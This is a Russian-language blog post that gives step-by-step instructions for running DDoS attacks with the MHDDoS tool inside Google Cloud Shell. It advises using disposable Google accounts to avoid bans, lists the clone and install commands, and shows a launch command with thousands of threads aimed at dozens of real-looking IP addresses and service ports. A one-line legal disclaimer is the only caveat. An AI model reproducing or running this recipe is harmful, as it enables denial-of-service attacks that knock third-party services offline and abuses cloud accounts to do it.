Найти в Дзене
Александр Хохлов

Эффективный DDoS с помощью утилиты MHDDoS в Google Cloud Shell

Внимание! Данная статья носит только информативный характер. Применение данного метода может быть не законным. Пошаговая инструкция для тех у кого есть не нужные гугл аккаунты (настоятельно НЕ РЕКОМЕНДУЮ использовать СВОИ ЛИЧНЫЕ АККАУНТЫ, возможен бан!). 1. В любом браузере заходим в гугл аккаунт. 2. Заходим по ссылке в Google Cloud Shell: https://shell.cloud.google.com/ 3. В командной строке терминала по очереди вводим такие 4-е команды: git clone https://github.com/porthole-ascend-cinnamon/mhddos_proxy.git cd mhddos_proxy git clone https://github.com/MHProDev/MHDDoS.git python3 -m pip install -r MHDDoS/requirements.txt Должно получиться так: 4. Пример команды для запуска процесса: python3 runner.py -t 1000 -p 1000 --rpc 100 --debug http://site.com В этой командной строке вместо http://site.com подставляем IP адреса и их порты нужных сайтов Пример запуска: python3 runner.py -t 1000 -p 1000 --rpc 100 --debug tcp://185.141.25.24:21 tcp://185.141.25.24:25 tcp://185.141.25.24:53 tcp://1

Внимание! Данная статья носит только информативный характер. Применение данного метода может быть не законным.

Пошаговая инструкция для тех у кого есть не нужные гугл аккаунты (настоятельно НЕ РЕКОМЕНДУЮ использовать СВОИ ЛИЧНЫЕ АККАУНТЫ, возможен бан!).

1. В любом браузере заходим в гугл аккаунт.

2. Заходим по ссылке в Google Cloud Shell: https://shell.cloud.google.com/

3. В командной строке терминала по очереди вводим такие 4-е команды:

git clone https://github.com/porthole-ascend-cinnamon/mhddos_proxy.git
cd mhddos_proxy
git clone https://github.com/MHProDev/MHDDoS.git
python3 -m pip install -r MHDDoS/requirements.txt

Должно получиться так:

-2

4. Пример команды для запуска процесса:

python3 runner.py -t 1000 -p 1000 --rpc 100 --debug http://site.com

В этой командной строке вместо http://site.com подставляем IP адреса и их порты нужных сайтов

Пример запуска:

python3 runner.py -t 1000 -p 1000 --rpc 100 --debug tcp://185.141.25.24:21 tcp://185.141.25.24:25 tcp://185.141.25.24:53 tcp://185.141.25.24:110 tcp://185.141.25.24:143 tcp://185.141.25.24:443 tcp://18.141.25.24:3306 tcp://68.6.123.46:21 tcp://68.6.123.46:25 tcp://68.6.123.46:53 tcp://68.6.123.46:110 tcp://68.6.123.46:143 tcp://68.6.123.46:443 tcp://45.12.206.242:21 tcp://45.12.206.242:22 tcp://45.12.206.242:25 tcp://45.12.206.242:53 tcp://45.12.206.242:80 tcp://45.12.206.242:110 tcp://45.12.206.242:143 tcp://45.12.206.242:443 tcp://45.12.206.242:465 tcp://45.12.206.242:587 tcp://45.12.206.242:993 tcp://45.12.206.242:995 tcp://45.12.206.242:1500 tcp://5.23.5.207:21 tcp://5.23.5.207:22 tcp://5.23.5.207:80 tcp://5.23.5.207:443 tcp://151.24.115.19:21 tcp://151.24.115.19:22 tcp://151.24.115.19:25 tcp://151.24.115.19:53 tcp://151.24.115.19:80 tcp://151.24.115.19:110 tcp://151.24.115.19:143 tcp://151.24.115.19:443 tcp://151.24.115.19:465 tcp://151.24.115.19:587 tcp://151.24.115.19:993 tcp://151.24.115.19:995 tcp://151.24.115.19:1500

IP адреса взяты случайным образом для примера

-3

После запуска процесса должно получиться что то вроде этого. Все, процесс пошел, окно браузера оставляем открытым.